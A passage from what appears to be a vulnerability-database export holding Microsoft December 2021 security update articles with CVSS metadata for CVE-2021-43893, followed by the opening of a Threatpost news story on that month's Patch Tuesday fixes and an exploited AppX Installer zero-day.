[file information for cumulative update 5008215](<https://download.microsoft.com/download/0/a/4/0a437d56-2351-40c2-a282-fae8a2cf6c25/5008215.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 22000.345](<https://download.microsoft.com/download/7/6/b/76b03471-cee3-4db5-8ea0-04d86a645d56/SSU_version_22000_345.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008215 (OS Build 22000.376)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008215", "href": "https://support.microsoft.com/en-us/help/5008215", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:43", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates because extended support ended on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB5006750](<https://support.microsoft.com/help/5006750>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008271>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008271](<https://download.microsoft.com/download/9/d/f/9dfbbd9b-8f4f-4c32-b72d-3c4b0bf9791b/5008271.csv>).\n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008271 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008271", "href": "https://support.microsoft.com/en-us/help/5008271", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:44", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5007263](<https://support.microsoft.com/help/5007263>) (released November 9, 2021) and addresses the following issues:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates because extended support ended on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5006750](<https://support.microsoft.com/help/5006750>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008274>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008274](<https://download.microsoft.com/download/6/b/f/6bff70c3-8a63-43d3-9bed-5d12f65908c7/5008274.csv>).\n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008274 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008274", "href": "https://support.microsoft.com/en-us/help/5008274", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:39", "description": "None\n**11/9/2021** \n**IMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2021. There will be a monthly security release (known as a \u201cB\u201d release) for December 2021. Normal monthly servicing for both B and C releases will resume in January 2022. \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1607, see its update history page. \n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Adds support for the cancellation of daylight savings time for the Republic of Fiji for 2021.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \nAfter you install this update on a server that is running Windows Server 2016, you might not be able to use Remote Desktop to reach the server. Eventually, the server might stop responding. Additionally, a black screen might appear, and signing in and general performance might slow.| This issue is resolved in [KB5010195](<https://support.microsoft.com/help/5010195>). \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).If you are using Windows Update, the latest SSU (KB5005698) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008207>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5008207](<https://download.microsoft.com/download/8/b/b/8bbc1fdd-27d0-44df-9688-25c2059645e2/5008207.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008207 (OS Build 14393.4825)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008207", "href": "https://support.microsoft.com/en-us/help/5008207", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:50", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter you install this Windows update on a server that is running Windows Server 2012 R2, the server may stop responding. Additionally, you may experience a black screen, slow sign in, or general slowness over time eventually causing the server to stop responding.| To help prevent the server from experiencing this issue, install Windows update [KB5010215](<https://support.microsoft.com/help/5010215>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008285>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008285](<https://download.microsoft.com/download/2/8/c/28c693b4-e59c-494d-940f-af6d876f681a/5008285.csv>). \n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008285 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008285", "href": "https://support.microsoft.com/en-us/help/5008285", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-12-15T14:21:48", "description": "Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications.\n\nThe patch came as part of the computing giant\u2019s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft\u2019s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.\n\nSeven of the bugs addressed are rated critical, six were previously disclosed as zero-days and 60 are considered \u201cimportant.\u201d\n\nThe update brings the total number of CVEs patched by Microsoft this year to 887, which is down 29 percent in volume from a very busy 2020.\n\n## **Zero-Day Exploited in Wild**\n\nThe zero-day ([CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>)) is an important-rated spoofing vulnerability in the Windows AppX Installer, which is a utility for side-loading Windows 10 apps, available on the App Store.\n\nKevin Breen, director of cyber-threat research at Immersive Labs, explained that the bug \u201callows an attacker to create a malicious package file and then modify it to look like a legitimate application, and has been used to deliver Emotet malware, which [made a comeback](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) this year.\u201d\n\nBreen warned, \u201cthe patch should mean that packages can no longer be spoofed to appear as valid, but it will not stop attackers from sending links or attachments to these files.\u201d\n\nPrior to its fix today, the bug was seen in multiple attacks associated with Emotet, TrickBot and Bazaloader, according to Satnam Narang, staff research engineer at Tenable.\n\n\u201cTo exploit this vulnerability, an attacker would need to convince a user to open a malicious attachment, which would be conducted through a phishing attack,\u201d he explained via email. \u201cOnce exploited, the vulnerability would grant an attacker elevated privileges, particularly when the victim\u2019s account has administrative privileges on the system.\u201d\n\nIf patching isn\u2019t an option, Microsoft has provided some workarounds to protect against the exploitation of this vulnerability.\n\n## **Other Publicly Known Microsoft Vulnerabilities**\n\nIt\u2019s worth noting that Microsoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a privilege-escalation vulnerability in Windows Installer, for which [there\u2019s been an exploit circulating](<https://threatpost.com/attackers-target-windows-installer-bug/176558/>), and, reportedly, active targeting by attackers \u2013 even though Microsoft said it has seen no exploitation.\n\n\u201cThis appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation-of-privilege vulnerability in Windows Installer that was reportedly fixed in November,\u201d Narang said. \u201cHowever, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.\u201d\n\nBreen noted that this kind of vulnerability is highly sought after by attackers looking to move laterally across a network.\n\n\u201cAfter gaining the initial foothold, achieving administrator-level access can allow attackers to disable security tools and deploy additional malware or tools like Mimikatz,\u201d he said. \u201cAlmost all ransomware attacks in the last year employed some form of privilege escalation as a key component of the attack prior to launching ransomware.\u201d\n\nFour other bugs were listed as \u201cpublicly known\u201d but not exploited, all rated important and allowing privilege escalation:\n\n * [CVE-2021-43240](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43240>), a NTFS Set Short Name\n * [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a Windows Encrypting File System (EFS)\n * [CVE-2021-43880](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43880>), Windows Mobile Device Management\n * [CVE-2021-41333](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>), Windows 